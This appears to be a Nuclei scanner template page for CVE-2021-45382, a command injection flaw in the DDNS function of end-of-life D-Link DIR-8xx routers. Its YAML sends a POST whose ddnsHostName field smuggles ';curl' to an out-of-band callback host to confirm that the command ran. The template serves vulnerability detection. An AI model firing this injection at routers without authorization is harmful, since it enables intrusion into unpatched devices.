Skip to content
Nuclei Templates

D-Link - Remote Command Execution

ID: CVE-2021-45382

Severity: critical

Author: king-alexander

Tags: cve2021,cve,dlink,kev,rce

Description

Section titled “Description”

A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file

YAML Source

Section titled “YAML Source”
id: CVE-2021-45382


info:
  name: D-Link - Remote Command Execution
  author: king-alexander
  severity: critical
  description: |
    A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file
  remediation: |
    DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45382
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264
    - https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.md#poc
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45382
    cwe-id: CWE-78
    epss-score: 0.96989
    epss-percentile: 0.9972
    cpe: cpe:2.3:o:dlink:dir-820l_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-820l_firmware
  tags: cve2021,cve,dlink,kev,rce
variables:
  string1: "{{to_lower(rand_base(5))}}"
  string2: "{{to_lower(rand_base(6))}}"


http:
  - method: POST
    path:
      - "{{BaseURL}}/ddns_check.ccp"


    body: "ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}"


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022100fe4c2e91a0ac775818ddd35fbbc8bae3110f2d1adcd0b1d06d5927a89cbf6f9702207cee9448d80b8ed46c7f8993c67ab0e87f0b5d6ca8b775a243f29c6e37403bd4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45382.yaml"

View on Github